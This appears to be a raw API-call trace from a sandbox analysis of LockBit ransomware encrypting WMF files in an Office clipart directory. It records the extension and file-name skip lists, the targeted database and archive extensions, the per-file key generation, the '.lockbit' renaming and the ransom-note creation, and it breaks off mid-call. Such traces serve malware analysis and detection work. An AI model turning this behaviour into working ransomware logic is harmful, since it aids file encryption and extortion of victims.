[0113.243] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.243] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.244] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.244] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.lockbit") returned 72 [0113.244] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0113.251] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.251] malloc (_Size=0x40068) returned 0x3d70450 [0113.251] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1768) returned 1 [0113.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0113.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0113.252] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.256] malloc (_Size=0xa6) returned 0x77d7a8 [0113.257] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.257] free (_Block=0x77d7a8) [0113.257] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.257] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.258] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.258] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81594a00, ftCreationTime.dwHighDateTime=0x1bd4c02, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81594a00, ftLastWriteTime.dwHighDateTime=0x1bd4c02, nFileSizeHigh=0x0, nFileSizeLow=0x384, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01434_.WMF", cAlternateFileName="")) returned 1 [0113.258] lstrcmpiW (lpString1=".", lpString2="DD01434_.WMF") returned -1 [0113.258] lstrcmpiW (lpString1="..", lpString2="DD01434_.WMF") returned -1 [0113.258] PathFindExtensionW (pszPath="DD01434_.WMF") returned=".WMF" [0113.258] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.258] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.259] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.259] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01434_.WMF") returned 1 [0113.260] lstrcmpiW (lpString1="ntldr", lpString2="DD01434_.WMF") returned 1 [0113.260] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01434_.WMF") returned 1 [0113.260] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01434_.WMF") returned -1 [0113.260] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01434_.WMF") returned -1 [0113.260] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01434_.WMF") returned 1 [0113.260] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01434_.WMF") returned 1 [0113.260] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.260] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned=".WMF" [0113.260] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.260] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.260] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.261] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.261] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.lockbit") returned 72 [0113.261] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0113.282] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.283] malloc (_Size=0x40068) returned 0x1ff1e60 [0113.283] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=900) returned 1 [0113.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.283] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0113.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0113.284] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.292] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.292] malloc (_Size=0xa6) returned 0x77d7a8 [0113.292] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.293] free (_Block=0x77d7a8) [0113.293] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.293] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.294] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.294] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55829800, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x55829800, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x9dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01585_.WMF", cAlternateFileName="")) returned 1 [0113.294] lstrcmpiW (lpString1=".", lpString2="DD01585_.WMF") returned -1 [0113.294] lstrcmpiW (lpString1="..", lpString2="DD01585_.WMF") returned -1 [0113.294] PathFindExtensionW (pszPath="DD01585_.WMF") returned=".WMF" [0113.294] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.294] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.295] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.295] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01585_.WMF") returned 1 [0113.296] lstrcmpiW (lpString1="ntldr", lpString2="DD01585_.WMF") returned 1 [0113.296] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01585_.WMF") returned 1 [0113.296] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01585_.WMF") returned -1 [0113.296] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01585_.WMF") returned -1 [0113.296] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01585_.WMF") returned 1 [0113.296] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01585_.WMF") returned 1 [0113.296] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.296] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned=".WMF" [0113.296] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.296] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.296] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.297] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.297] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.lockbit") returned 72 [0113.297] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0113.298] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.298] malloc (_Size=0x40068) returned 0x3e70008 [0113.298] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2524) returned 1 [0113.298] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0113.299] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.299] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0113.299] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0113.305] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.305] malloc (_Size=0xa6) returned 0x77d7a8 [0113.305] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.306] free (_Block=0x77d7a8) [0113.306] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.306] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.306] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf93000, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4bf93000, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x914, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01586_.WMF", cAlternateFileName="")) returned 1 [0113.306] lstrcmpiW (lpString1=".", lpString2="DD01586_.WMF") returned -1 [0113.306] lstrcmpiW (lpString1="..", lpString2="DD01586_.WMF") returned -1 [0113.306] PathFindExtensionW (pszPath="DD01586_.WMF") returned=".WMF" [0113.306] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.306] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.306] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.306] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.306] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.307] lstrcmpiW (lpString1=".diagcab", 